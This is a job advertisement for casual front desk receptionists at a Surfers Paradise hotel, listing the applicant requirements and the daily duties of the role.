Front Desk/ Reception (Guest Service Agent)
Our company is currently seeking 2-3 dedicated and committedcasual Front Office Personnel, to work in busy hotel front desk /reception issurfers Paradise Gold Coast. Approximately 4 days per week, including weekends.
You will have: - · ABN required
- · IELTS overall 7.5 with excellent grooming and presentation skills
- · Confidence to solve problems without supervision
- · Excellent time management and organisationalskills.
- · Ability to work under pressure and excellentattention to detail.
- · Flexibility to work various shifts includingevening and weekends (our hours of operation are between 07:00am and 09:30pmdaily).
Qualifications in Hospitality, Tourism or Business Management advantageous, but not essential.
Key responsibilities: · Performing all duties associated with the day today operation of a busy front desk, adhering to our policies and procedures atall times, and maintaining a helpful, friendly and professional demeanour.
- · Assignrooms to guests and provide them with instruction on using automated keys
- · Make reservations over the phone and confirm them by providing call back services
- · Instruct bellhops to escort guests to their rooms and handle luggage
- Maintain information of room availability and guests’ accounts
- · Perform book keeping activities such as position charges and computing bills
- · Collect payments inthe form of cash and process credit card payments
- · Record guests’ comments and complaints
- · Advise housekeeping staff to handle tasks when rooms are vacated
- · Answer incoming telephone calls and provide information on hotel’sservices
- · Take and relay messages to guests
- · Issue safety depositboxes to guests when requested
- · Accept and carry out wake-up call requests
- · Make cash drops atthe end of each shift
- · Refer guests to appropriate departments to ensure that their complaints are resolved
- · Take and verify identification during check-ins
- · Perform cleaning andmaintenance tasks on the front desk
- · Offer guests adviceon local shopping and eating areas
- · Communicate with staff on the previous shift to manage guests’ arrivalsand reservations
- · Inform management ofany discrepancies in front desk operations
- · Balance rebates and miscellaneous charges
- · Provide guests with information on entertainment prospects inside the hotel
- · Provide travel instructions to guests and arrange for transportation
- · Complete and present reports pertaining to housekeeping to the management
- · Report safety hazards to the management or security officials
